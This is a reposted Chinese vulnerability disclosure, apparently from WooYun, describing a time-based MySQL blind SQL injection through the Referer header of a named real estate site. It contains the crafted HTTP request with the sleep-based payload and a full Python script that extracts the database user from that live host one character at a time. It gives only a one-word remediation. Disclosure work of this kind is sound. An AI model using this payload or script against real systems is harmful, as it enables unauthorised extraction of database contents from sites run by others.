记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

焦点房产分站MySQL盲注 (附猜解python脚本)

2014-12-17 15:45

注入点:

code 区域
GET / HTTP/1.1

Referer: aaa'+sleep(if(ascii(mid(lower(user()),1,1))!=1,5,0))+'bbb

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

X-Requested-With: XMLHttpRequest

Host: www.tj.focus.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*



Referer可注入。基于时间的MySQL盲注。



上述HTTP Request将延迟。

漏洞证明:

猜解得到user,可能有误报,随手乱写,仅用于验证:

focus_user@192.1.168.62

focus_1.png



附猜解脚本:

code 区域
#encoding=utf-8

import httplib

import time

import string

import sys

import random

import hashlib





headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'}



payloads = list(string.ascii_lowercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.']



print '[%s] Start to retrive MySQL User' % time.strftime('%H:%M:%S', time.localtime())

user = ''

for i in range(1, 30):

found=False

while found==False:

for payload in payloads:

timeout_count = 0

for j in range(1,3): # 2 times to confirm

try:

referer= str(random.random()) + "aaa'+sleep(if(ascii(mid(lower(user()),{index},1))={char_code},5,0))+'bbb" + str(random.random())

headers['Referer'] = referer.replace('{index}', str(i)).replace('{char_code}', str(ord(payload)))

conn = httplib.HTTPConnection('www.tj.focus.cn', timeout=4)

conn.request(method='GET',

url='/',

headers=headers)

conn.getresponse().read()

conn.close()

print '.',

break

except Exception, e:

timeout_count += 1

time.sleep(5) # wait DB server recover from last query

if timeout_count == 2:

user += payload

print '\n[In progress] now user is %s' % user

found = True

break



print '\nFinally, MySQL user is', user

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-081727

阅读:60469 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“焦点房产分站MySQL盲注 (附猜解python脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云